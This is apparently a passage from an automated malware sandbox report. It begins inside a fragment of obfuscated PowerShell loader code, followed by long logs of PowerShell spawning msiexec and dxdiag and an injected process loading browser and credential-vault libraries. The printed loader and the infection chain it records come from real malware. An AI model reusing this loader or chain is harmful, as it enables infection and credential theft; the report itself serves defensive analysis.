GIr d7 SweZSa.lLNonqO RanAH bk9 UdbQA coZ NeuG F r5F,si-SandnAcrav Gr AAmebw Haltblaa0 dsabS alW eprXFerl8 B,fi IcoeMaalrGipsl,sop9,linM TimRvan,hTamigTantq';$Stenografere=Sinterens 'Gyn >';$Semidocumentary=Sinterens 'SmreI ConEElskX';$Hypermetamorphotic='Drklokke';$dirigentklokkernes='\Beflingens.Com';Bldagtigeres (Sinterens 'Drif$St mGModpLUntho.ismB StoAPjasLSub :Be eASuprf UndKCru rSla f,rmltUnareRockREmne= gte$Te,eeEmptnjuleV Co :Cat a .plp D,rPSa nD IntA rteTRuffAF nn+Hj d$I dfDFreiIT,otRUnsuI MongArvee mpln AretVe sk onLPugiObipekCarbkha,ve redRCalons ntEUdarS');Bldagtigeres (Sinterens ' Ist$r,paGExchlveneOButcbHe tA HysLHamm:VeteuJordDD safInaulsynge ndutKo tnerg.IBlovnEle.GPublEB.kkrStvlNT,ktESto =Big.$BookfRetsiFluoB InsR PleOFeltMforsY N,nx FacO VmsS Erha.ecirCompCFleto RanmMan a fo .Bit,sOverPMicrLCam.IUngdTDat (Non.$Gld SAlabT CumeInteN AftOEmfagDrejrh.emaChirF Gr Et.ttRT.acESy,u)');Bldagtigeres (Sinterens $Caplock);$Fibromyxosarcoma=$Udfletningerne[0];$Kumiss=(Sinterens ' ice$MbleGUdspLO enONon,B BriASerpLp ym: rbeK VagNCol,UB.ceS YelE sidL S rsHabikUnf eAnisn EmidGasdESvrvsBygn= Ba nbdleE S nWChei- B oO MolbN.alJLumbEUnr.CPapdtUmed F stsSpicyE ots,rget Tr EPalem Spl.Bic.$Cen fEnvieGrosl HaltSkudUTracnStegDUtt,eUnalRPseusSubrg TyneNe rl MaaSHalvEGanos');Bldagtigeres ($Kumiss);Bldagtigeres (Sinterens 'Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeProcess created: C:\Windows\SysWOW64\poqexec.exe "C:\Windows\SysWOW64\poqexec.exe"Jump to behavior
              Source: C:\Program Files (x86)\cRAssrvTaqGsRgvEflWgMJWzjbMYQNFPjdKckFgSTyEPzRYDikluTHZOjizWeQLVqXQYLRfXu\FUrHThL4lQ4AVjnAsevEg.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: wintypes.dllJump to behavior
